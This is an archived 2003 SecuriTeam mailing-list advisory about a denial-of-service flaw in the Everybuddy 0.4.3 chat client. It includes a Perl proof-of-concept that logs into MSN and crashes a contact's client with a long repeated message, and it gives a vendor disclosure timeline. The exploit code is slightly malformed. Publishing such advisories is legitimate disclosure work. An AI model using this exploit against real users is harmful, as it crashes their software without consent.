[NEWS] Everybuddy Vulnerable to a DoS Attack (Long Message)
From: SecuriTeam (support_at_securiteam.com)
Date: 08/05/03
- Previous message: SecuriTeam: "[NEWS] Novell GroupWise Clear Text Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 5 Aug 2003 12:55:00 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
Get Thawte's New Step-by-Step SSL Guide for MSIIS
In this guide you will find out how to test, purchase, install
and use a Thawte Digital Certificate on your MSIIS web server.
Throughout, best practices for set-up are highlighted to help you
ensure efficient ongoing management of your encryption keys and digital
certificates. Get your copy of this new guide now:
http://ad.doubleclick.net/clk;5903126;8265119;j
- - - - - - - - -
Everybuddy Vulnerable to a DoS Attack (Long Message)
------------------------------------------------------------------------
SUMMARY
<http://www.everybuddy.com/en/index.php> Everybuddy has support for AIM,
ICQ, MSN, Yahoo! and Jabber chat programs, the program contains a security
vulnerability that allows remote attackers to cause the program to crash
by sending it an overly long message (instant message).
DETAILS
Vulnerable systems:
* Everybuddy version 0.4.3
Exploit:
The exploit code will login as a user, wait for someone to talk to him,
and send him the attack string.
#!/usr/bin/perl
use MSN; # from <http://www.adamswann.com/library/2002/msn-perl/>
http://www.adamswann.com/library/2002/msn-perl/
my $client = MSN->new();
$client->connect('email address', 'password', '', {
Status => \&Status,
Answer => \&Answer,
Message => \&Message,
Join => \&Join }
);
sub Status {
my ($self, $username, $newstatus) = @_;
print "Status() called with parameters:\n";
print " " . join(",", @_), "\n";
# Print the status change info.
print "${username}'s status changed from " .
$self->buddystatus($username) . " to $newstatus.\n";
# Initiate the call.
$self->call($username);
# The call may take a few seconds to complete, so we can't
# immediately send messages. Let's put the message in a
# FIFO (queue) that is keyed by username.
push (@{$queue{$username}}, "Glad to see you online!");
}
}
sub Message {
my ($self, $username, undef, $msg) = @_;
print "Message() called with parameters:\n";
print " " . join(",", @_), "\n";
}
sub Join {
my ($self, $username) = @_;
print "Join() called with parameters:\n";
print " " . join(",", @_), "\n";
# See if there's anything queued up.
# Deliver each message if there is stuff in the queue for this user.
while ($_ = shift @{$queue{$username}}) {
$$self->sendmsg($_);
}
}
sub Answer {
my ($self, $username) = @_;
print "Answer() called with parameters:\n";
print " " . join(",", @_), "\n";
# Send a hello message.
$$self->sendmsg("AAAAAAAAAAAAAAAAAAAAAAAAAAA\r"x55);
}
Vendor status:
After numerous attempts to contact the vendor (in some cases the vendor
replied, but then disappeared again), we are forced to release this
information, without receiving a proper response from them.
Disclosure timeline:
19/06/2003 - First attempt to contact vendor
20/06/2003 - First vendor response
22/06/2003 - PoC provided to vendor
01/07/2003 - Second attempt to contact vendor
01/08/2003 - Third attempt to contact vendor
05/08/2003 - Public advisory
ADDITIONAL INFORMATION
The information has been provided by <mailto:noamr@beyondsecurity.com>
Noam Rathaus and <mailto:expert@securiteam.com> SecurITeam Experts.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NEWS] Novell GroupWise Clear Text Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [NT] w3wp DoS
... The following security advisory is sent to the securiteam mailing list, and
can be found at the SecuriTeam web site: http://www.securiteam.com ... 1/12/2006 - Vendor requested
for additional info ... recv(conn_socket, szBuffer, 256, 0); ... (Securiteam) - [EXPL] phpBB highlight Arbitrary File Upload (Santy.A)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... sub PayLoad(); ...
eval{fork and exit;}; ... (Securiteam) - [NEWS] HAURI Anti-Virus Directory Traversal
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... * ViRobot Advanced Server
... The vendor has released a patch for ViRobot Linux Server 2.0: ... (Securiteam) - [UNIX] Happymall E-Commerce Input Validation Flaw Lets Remote Users Execute Arbitrary Commands
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Revin Aldi reported an input
validation vulnerability in the Happymall ... The vendor reports that the 'member_html.cgi'
script is also affected. ... (Securiteam) - [UNIX] Multiple Vendor xzgv PRF Parsing Integer Overflow Vulnerability
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Remote exploitation of an integer
overflow vulnerability in various ... Vendor Response: ... (Securiteam)
